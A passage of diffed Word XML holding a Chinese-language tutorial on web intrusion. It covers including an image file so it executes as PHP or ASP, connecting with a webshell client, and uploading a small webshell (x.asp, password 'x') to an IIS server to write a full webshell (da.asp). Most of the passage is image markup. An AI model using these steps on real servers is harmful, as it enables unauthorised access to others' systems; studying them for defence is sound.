+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>这时候假如成功利用漏洞上传了另外一个包含文件</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>bao.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2819400" cy="390525"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="42" name="图片 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 19"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId44"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2819400" cy="390525"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>那么图片的代码就可以被当成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>来解析了，使用浏览器访问一下这个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>bao.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2307025"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="43" name="图片 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 22"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId45"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2307025"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>然后使用菜刀连接</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>bao.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4476750" cy="2286000"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="44" name="图片 25"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 25"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId46"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4476750" cy="2286000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>就可以成功获取</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>webshell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>了</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4848225" cy="2771775"/>
+            <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
+            <wp:docPr id="45" name="图片 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 28"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId47"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4848225" cy="2771775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg2"/>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>另外</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的包含代码为：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&lt;!--#include file="1.jpg"--&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>通过小马上传大马</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将提供写入接口的小马</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>改名为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">x.asp </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后将其</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>上传到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>IIS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>服务器当中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5172075" cy="1228725"/>
+            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
+            <wp:docPr id="49" name="图片 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId48"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5172075" cy="1228725"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5095875" cy="1076325"/>
+            <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
+            <wp:docPr id="51" name="图片 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 13"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5095875" cy="1076325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="75000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后使用浏览器访问，密码为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="1054862"/>
+            <wp:effectExtent l="19050" t="19050" r="21590" b="11938"/>
+            <wp:docPr id="52" name="图片 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 16"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId50"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1054862"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="75000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>登录后，会看到上传大马的接口</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5133975" cy="2476500"/>
+            <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
+            <wp:docPr id="60" name="图片 40"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 40"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId51"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5133975" cy="2476500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="65000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将当前路径复制，在第一个表单上黏贴并且改名为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da.asp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，下面大框中填入大马</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5067300" cy="2505075"/>
+            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
+            <wp:docPr id="55" name="图片 25"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 25"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId52"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5067300" cy="2505075"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="75000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4600575" cy="2028825"/>
+            <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
+            <wp:docPr id="57" name="图片 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 31"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId53"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4600575" cy="2028825"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="75000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
